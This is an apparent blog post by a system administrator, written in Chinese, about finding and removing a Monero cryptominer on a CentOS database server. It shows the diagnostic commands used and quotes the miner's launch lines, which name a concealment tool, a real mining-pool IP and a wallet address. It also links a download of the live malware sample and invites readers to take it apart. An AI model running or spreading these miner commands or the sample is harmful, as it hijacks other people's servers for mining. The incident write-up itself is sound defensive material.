遭遇挖矿程序

没有想到我也赶了一回时髦，居然遭遇了挖矿程序，刚接手一个系统，服务器是第三方公司装的环境，我本着打酱油的心态过来看看的，没想到没几天就有同事反映说系统很慢，上服务器一看，应用服务器正常，数据库服务器里面top一看，有个md的进程占据了大多数资源，一搜原来是门罗币的挖矿程序。

发现过程：

 

操作系统是centos的：

命令1：top 11268 oracle    20   0 3202m 5892  948 S 3756.8  0.0 517352:12 md

命令2：ps aux|grep 11268 oracle   11268 3798  0.0 3119148 5892 ?        Sl   Jan08 517361:59 -bash                                                                                                                                                                                                                                                           -a cryptonight -o stratum+tcp://198.251.81.82:3333 -u 49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs -p x 注意：我向上帝发誓，这一堆回车什么的原样就这样的，我本来想查个进程名称的，得到的就是md和-bash

命令3：netstat -anp|grep 3333 tcp        0      0 192.168.100.100:40315   198.251.81.82:3333      ESTABLISHED 11268/-bash

 

查了一下ip地址：198.251.81.8，是美国的。

 

查找问题：

我有root权限，当然可以横着走，直接简单粗暴： 命令：find / -type f |xargs grep "198.251.81.82" >01.txt   慢慢运行着去吧，我第二天来看看结果，这句命令就是查找所有包含这个ip地址的文本文件

第二天看到结果如下： 命令：cat 01.txt /home/oracle/.data_oracle/run:        ./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://198.251.81.82:3333 -u 49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs -p x >>/dev/null & /home/oracle/.data_oracle/run:        ./h64 -s $HIDE ./md -a cryptonight -o stratum+tcp://198.251.81.82:3333 -u 49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs -p x >>/dev/null & /home/oracle/.data_oracle/run:        ./h64 -s $HIDE ./mdx -a cryptonight -o stratum+tcp://198.251.81.82:3333 -u 49GCPDCt138h1Qg25WfEynSZgCbQkWLr8KrtN5hUW1xwewEzf2YhmL477Zpf6CXUH5JXMtdEcy8rP8z6zKzJD5TADDb8QXs -p x >>/dev/null &

 

问题解决：

为了避免这个破东西卷土重来，我又很懒，懒得去弄补丁，系统肯定是有漏洞了，不去删除了，弄个空的放着吧，要不对方发现程序没了，八成就又会给我弄一个过来

cd /home/oracle/.data_oracle/ cat /dev/null > a cat /dev/null > bash.pid cat /dev/null > cron.d cat /dev/null > dir.dir cat /dev/null > h32 cat /dev/null > h64 cat /dev/null > md cat /dev/null > md32 cat /dev/null > mdx cat /dev/null > run cat /dev/null > upd cat /dev/null > x

最后把进程干掉 命令：kill 11268

 

 

好了，下面就是这个挖矿程序的活体，有兴趣的同学可以打开看看，写个详细解析文章，多半都是unix shell脚本，很容易懂。

 

http://download.csdn.net/download/landehutu/10218235

-rwxr-xr-x. 1 oracle oinstall  838583 2月  21 2016 h64
-rwxr-xr-x. 1 oracle oinstall   15125 2月  21 2016 h32
-rwxr-xr-x. 1 oracle oinstall 2979640 6月  24 2017 md
-rwxr-xr-x. 1 oracle oinstall  168896 9月  27 18:58 mdx
-rwxr-xr-x. 1 oracle oinstall      24 10月  5 02:45 x
-rwxr-xr-x. 1 oracle oinstall  227220 10月 22 22:25 md32
-rwxr-xr-x. 1 oracle oinstall     305 10月 24 00:13 a
-rwxr-xr-x. 1 oracle oinstall     783 10月 31 03:19 run
-rw-r--r--. 1 oracle oinstall      26 1月   8 10:45 dir.dir
-rw-r--r--. 1 oracle oinstall      56 1月   8 10:45 cron.d
-rwxr--r--. 1 oracle oinstall     211 1月   8 10:45 upd
-rw-r--r--. 1 oracle oinstall       6 1月  17 22:10 bash.pid